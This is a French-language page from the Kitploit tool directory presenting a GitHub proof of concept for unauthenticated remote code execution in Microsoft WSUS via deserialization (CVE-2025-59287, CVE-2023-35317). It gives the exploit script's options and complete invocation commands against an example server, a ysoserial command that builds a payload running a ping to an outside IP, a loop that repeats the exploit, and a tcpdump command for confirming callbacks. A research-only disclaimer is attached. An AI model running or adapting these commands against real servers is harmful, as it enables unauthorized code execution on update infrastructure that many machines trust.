Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59287-PoC — PoC d'exécution de code à distance (RCE) non authentifiée dans Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317 | Kitploit
Outils/GitHubGitHub/m507/cve-2025-59287-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

PoC d'exécution de code à distance (RCE) non authentifiée dans Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317

Voir le dépôt
143il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59287 / CVE-2023-35317 PoC

Au cœur de CVE-2025-59287 : RCE via SoapFormatter dans WSUS : https://shellcode.blog/wsus-cve-2025-59287-investigation/

Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Utilisation

Options obligatoires :

  • --target-url – URL de base du serveur WSUS cible, p. ex. http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – L'un de CVE-2023-35317 ou CVE-2025-59287

Options facultatives :

  • --dns-name – Nom DNS du client utilisé dans les requêtes SOAP (défaut : bugcrowd.local)
  • --random – Préfixe --dns-name avec un sous-domaine aléatoire afin que chaque exécution apparaisse comme un nouveau client
  • --payload – Payload ysoserial personnalisée encodée en base64 ; si elle est omise, une payload intégrée est utilisée pour le --cve choisi
  • --debug – Active la journalisation de débogage détaillée (lignes [DEBUG])

CVE-2025-59287

  1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

alt text

Déclenchement manuel – CVE-2023-35317

  1. (Facultatif) Générez une payload avec Ysoserial.Net si vous ne souhaitez pas utiliser celle intégrée (ou fiez-vous à la payload intégrée).
  2. Exécutez : python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
  3. Ouvrez la console WSUS

alt text

Déclenchement automatique – CVE-2023-35317

  1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (ou fiez-vous à la payload intégrée pour --cve CVE-2023-35317)
  2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
  3. Attendez 1 à 3 minutes et elle s'exécutera dans le processus du service.
  4. Surveillez les connexions ICMP : sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

alt text

Télécharger l’outil